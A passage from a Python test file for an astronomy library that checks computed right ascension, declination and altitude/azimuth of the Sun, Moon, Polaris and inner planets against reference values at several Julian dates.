compare(ra.hours, 8.02969030304998, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.497605463260726, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 8.000108116572395, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.58493093599605, 0.001 * arcsecond)
def test_sun_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, 1.0118605934887042, 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 3.776110727862678, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.907832379364574, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 3.775721385487214, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.906601181542, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 3.7666292045824337, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.879173772309745, 0.001 * arcsecond)
def test_sun_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, 0.9833276788862821, 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 18.752544254682526, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.033309607967187, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.752126228091367, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.03376015263556, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.75183797477899, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.032488638722818, 0.001 * arcsecond)
def test_sun_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, 1.0107820040799866, 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 10.268162490439073, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.751933902906119, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 10.267805651450434, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.753946960547603, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 10.279264504672039, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.688507865341325, 0.001 * arcsecond)
def test_sun_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, (1.0160878650466754, 1.0118605934887042, 0.9833276788862821, 1.0107820040799866), 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (8.03008088792976, 3.776110727862678, 18.752544254682526, 10.268162490439073), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.496475643233936, 19.907832379364574, -23.033309607967187, 10.751933902906119), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (8.02969030304998, 3.775721385487214, 18.752126228091367, 10.267805651450434), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.497605463260726, 19.906601181542, -23.03376015263556, 10.753946960547603), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (8.000108116572395, 3.7666292045824337, 18.75183797477899, 10.279264504672039), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.58493093599605, 19.879173772309745, -23.032488638722818, 10.688507865341325), 0.001 * arcsecond)
def test_moon_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, 0.0026034424248854585, 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 12.472463241145173, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.546618838170065, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.472340287066462, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.545964408923231, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.446262111681095, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.378227942512158, 0.001 * arcsecond)
def test_moon_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, 0.0024815092296598847, 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 23.676443817409496, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.8587554901327035, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 23.676289920709518, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.857413875990142, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 23.66827809687387, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.8051891857266409, 0.001 * arcsecond)
def test_moon_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, 0.002690202988513297, 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 14.830020573942235, 0.001 * ra_arcsecond)
compare(dec.degrees, -10.900635500943373, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 14.829807890359675, 0.001 * ra_arcsecond)
compare(dec.degrees, -10.90012775884129, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 14.829573271760747, 0.001 * ra_arcsecond)
compare(dec.degrees, -10.897905576904787, 0.001 * arcsecond)
def test_moon_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, 0.0024739078649309238, 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 16.39102815233177, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.93676001523414, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.39106196861365, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.936774891979848, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 16.40383113143219, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.96508913558473, 0.001 * arcsecond)
def test_moon_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, (0.0026034424248854585, 0.0024815092296598847, 0.002690202988513297, 0.0024739078649309238), 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (12.472463241145173, 23.676443817409496, 14.830020573942235, 16.39102815233177), 0.001 * ra_arcsecond)
compare(dec.degrees, (-4.546618838170065, 1.8587554901327035, -10.900635500943373, -20.93676001523414), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.472340287066462, 23.676289920709518, 14.829807890359675, 16.39106196861365), 0.001 * ra_arcsecond)
compare(dec.degrees, (-4.545964408923231, 1.857413875990142, -10.90012775884129, -20.936774891979848), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.446262111681095, 23.66827809687387, 14.829573271760747, 16.40383113143219), 0.001 * ra_arcsecond)
compare(dec.degrees, (-4.378227942512158, 1.8051891857266409, -10.897905576904787, -20.96508913558473), 0.001 * arcsecond)
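
# The Polaris tests observe a fixed star built from catalog values (position,
# proper motion in mas per year, parallax in mas, and radial velocity in km/s)
# instead of an ephemeris body.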
def test_polaris_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.5283697499529345, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.2642084845529, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.52280149297809, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.25882879505869, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.0385816433557173, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.11999387030946, 0.001 * arcsecond)
def test_polaris_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.5296910275944064, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26413894692217, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.503356852811078, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26201007627152, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.3329211805288432, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.22082922133737, 0.001 * arcsecond)
def test_polaris_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.5302921882000127, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26411027119273, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.544633215462727, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26917874902797, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.5459982729094564, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26697328449004, 0.001 * arcsecond)
def test_polaris_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.531117065610149, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26406906493733, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.541609533735535, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.25923373182651, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.8064741334456413, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.3136939266471, 0.001 * arcsecond)
def test_polaris_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (2.5283697499529345, 2.5296910275944064, 2.5302921882000127, 2.531117065610149), 0.001 * ra_arcsecond)
compare(dec.degrees, (89.2642084845529, 89.26413894692217, 89.26411027119273, 89.26406906493733), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (2.52280149297809, 2.503356852811078, 2.544633215462727, 2.541609533735535), 0.001 * ra_arcsecond)
compare(dec.degrees, (89.25882879505869, 89.26201007627152, 89.26917874902797, 89.25923373182651), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (2.0385816433557173, 2.3329211805288432, 2.5459982729094564, 2.8064741334456413), 0.001 * ra_arcsecond)
compare(dec.degrees, (89.11999387030946, 89.22082922133737, 89.26697328449004, 89.3136939266471), 0.001 * arcsecond)
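
# The topocentric tests observe from 38.9215 N, 77.0669 W at 92 m elevation
# (the 'usno' name suggests the U.S. Naval Observatory in Washington, D.C.)
# and check alt/az three ways: with no arguments, with the 'standard'
# refraction model, and with explicit values (10.0, 1010.0, presumably
# temperature in degrees C and pressure in mbar).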
def test_mercury_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 7.9049140222444105, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.33276016366845, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 7.874898511438327, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.415294637224765, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 46.3212267566032, 0.001 * arcsecond)
compare(az.degrees, 262.18590521567705, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 46.33688339908365, 0.001 * arcsecond)
compare(az.degrees, 262.18590521567705, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 46.33704240110901, 0.001 * arcsecond)
compare(az.degrees, 262.18590521567705, 0.001 * arcsecond)
def test_mercury_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.469959592064856, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.24594905426479, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.461508188066483, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.205182598299666, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -17.340667089884377, 0.001 * arcsecond)
compare(az.degrees, 300.9176579181716, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -17.340667089884377, 0.001 * arcsecond)
compare(az.degrees, 300.9176579181716, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -17.340667089884377, 0.001 * arcsecond)
compare(az.degrees, 300.9176579181716, 0.001 * arcsecond)
def test_mercury_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.138603904058247, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.421550562485436, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.138318996641566, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.420003066967503, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -0.12765060376706572, 0.001 * arcsecond)
compare(az.degrees, 121.97764361867154, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 0.36890915770104016, 0.001 * arcsecond)
compare(az.degrees, 121.97764361867154, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 0.3731892291678349, 0.001 * arcsecond)
compare(az.degrees, 121.97764361867154, 0.001 * arcsecond)
def test_mercury_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 9.29546814256182, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.68590812465023, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 9.307459135231527, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.630243128506475, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -9.116616855755964, 0.001 * arcsecond)
compare(az.degrees, 300.1420264373104, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -9.116616855755964, 0.001 * arcsecond)
compare(az.degrees, 300.1420264373104, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -9.116616855755964, 0.001 * arcsecond)
compare(az.degrees, 300.1420264373104, 0.001 * arcsecond)
def test_mercury_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (7.9049140222444105, 2.469959592064856, 18.138603904058247, 9.29546814256182), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.33276016366845, 11.24594905426479, -24.421550562485436, 16.68590812465023), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (7.874898511438327, 2.461508188066483, 18.138318996641566, 9.307459135231527), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.415294637224765, 11.205182598299666, -24.420003066967503, 16.630243128506475), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (46.3212267566032, -17.340667089884377, -0.12765060376706572, -9.116616855755964), 0.001 * arcsecond)
compare(az.degrees, (262.18590521567705, 300.9176579181716, 121.97764361867154, 300.1420264373104), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (46.33688339908365, -17.340667089884377, 0.36890915770104016, -9.116616855755964), 0.001 * arcsecond)
compare(az.degrees, (262.18590521567705, 300.9176579181716, 121.97764361867154, 300.1420264373104), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (46.33704240110901, -17.340667089884377, 0.3731892291678349, -9.116616855755964), 0.001 * arcsecond)
compare(az.degrees, (262.18590521567705, 300.9176579181716, 121.97764361867154, 300.1420264373104), 0.001 * arcsecond)
def test_venus_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 4.9665155792599744, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.20866872703497, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 4.936546062416392, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.165161469755127, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 11.152374062990575, 0.001 * arcsecond)
compare(az.degrees, 287.0030740239532, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 11.23199275246975, 0.001 * arcsecond)
compare(az.degrees, 287.0030740239532, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 11.232796262162083, 0.001 * arcsecond)
compare(az.degrees, 287.0030740239532, 0.001 * arcsecond)
def test_venus_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 1.1614662937271143, 0.001 * ra_arcsecond)
compare(dec.degrees, 5.325222585955545, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 1.1533422187037876, 0.001 * ra_arcsecond)
compare(dec.degrees, 5.275819541572404, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -34.134914076462266, 0.001 * arcsecond)
compare(az.degrees, 313.64872862118426, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -34.134914076462266, 0.001 * arcsecond)
compare(az.degrees, 313.64872862118426, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -34.134914076462266, 0.001 * arcsecond)
compare(az.degrees, 313.64872862118426, 0.001 * arcsecond)
def test_venus_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.99311221167692, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.45256680288619, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.99286396137589, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.450404301558034, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 23.228910604670816, 0.001 * arcsecond)
compare(az.degrees, 142.1161398141626, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 23.266773672986005, 0.001 * arcsecond)
compare(az.degrees, 142.1161398141626, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 23.267157712313676, 0.001 * arcsecond)
compare(az.degrees, 142.1161398141626, 0.001 * arcsecond)
def test_venus_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 7.175218975921811, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.87224931182421, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 7.187940160922054, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.849149573371733, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -24.359995410915445, 0.001 * arcsecond)
compare(az.degrees, 327.640588969984, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -24.359995410915445, 0.001 * arcsecond)
compare(az.degrees, 327.640588969984, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -24.359995410915445, 0.001 * arcsecond)
compare(az.degrees, 327.640588969984, 0.001 * arcsecond)
def test_venus_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (4.9665155792599744, 1.1614662937271143, 15.99311221167692, 7.175218975921811), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.20866872703497, 5.325222585955545, -18.45256680288619, 19.87224931182421), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (4.936546062416392, 1.1533422187037876, 15.99286396137589, 7.187940160922054), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.165161469755127, 5.275819541572404, -18.450404301558034, 19.849149573371733), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (11.152374062990575, -34.134914076462266, 23.228910604670816, -24.359995410915445), 0.001 * arcsecond)
compare(az.degrees, (287.0030740239532, 313.64872862118426, 142.1161398141626, 327.640588969984), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (11.23199275246975, -34.134914076462266, 23.266773672986005, -24.359995410915445), 0.001 * arcsecond)
compare(az.degrees, (287.0030740239532, 313.64872862118426, 142.1161398141626, 327.640588969984), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (11.232796262162083, -34.134914076462266, 23.267157712313676, -24.359995410915445), 0.001 * arcsecond)
compare(az.degrees, (287.0030740239532, 313.64872862118426, 142.1161398141626, 327.640588969984), 0.001 * arcsecond)
def test_mars_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.030112454663165, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.130883187697044, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.999737237126766, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.048966502229923, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -3.540294697028628, 0.001 * arcsecond)
compare(az.degrees, 118.34877634707522, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -3.540294697028628, 0.001 * arcsecond)
compare(az.degrees, 118.34877634707522, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -3.540294697028628, 0.001 * arcsecond)
compare(az.degrees, 118.34877634707522, 0.001 * arcsecond)
def test_mars_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 23.54486790147113, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.883946644223003, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 23.53682348628842, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.936042744435578, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -54.1089628741949, 0.001 * arcsecond)
compare(az.degrees, 338.0117138951488, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -54.1089628741949, 0.001 * arcsecond)
compare(az.degrees, 338.0117138951488, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -54.1089628741949, 0.001 * arcsecond)
compare(az.degrees, 338.0117138951488, 0.001 * arcsecond)
def test_mars_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 22.034740913364253, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.182784253332377, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 22.03447079524992, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.183338672731741, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -36.90573266459917, 0.001 * arcsecond)
compare(az.degrees, 76.12368450672822, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -36.90573266459917, 0.001 * arcsecond)
compare(az.degrees, 76.12368450672822, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -36.90573266459917, 0.001 * arcsecond)
compare(az.degrees, 76.12368450672822, 0.001 * arcsecond)
def test_mars_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 13.8940809044733, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.122804110106655, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 13.905664739133574, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.185661905051244, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 22.094794272017666, 0.001 * arcsecond)
compare(az.degrees, 231.6381663847761, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 22.134776069489533, 0.001 * arcsecond)
compare(az.degrees, 231.6381663847761, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 22.135181528743814, 0.001 * arcsecond)
compare(az.degrees, 231.6381663847761, 0.001 * arcsecond)
def test_mars_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (16.030112454663165, 23.54486790147113, 22.034740913364253, 13.8940809044733), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.130883187697044, -4.883946644223003, -13.182784253332377, -12.122804110106655), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (15.999737237126766, 23.53682348628842, 22.03447079524992, 13.905664739133574), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.048966502229923, -4.936042744435578, -13.183338672731741, -12.185661905051244), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
